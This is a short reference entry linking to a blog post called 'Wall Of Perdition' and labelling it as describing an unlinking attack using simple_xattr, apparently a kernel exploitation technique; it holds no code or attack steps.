- https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)
Unlinking attack with simple_xattr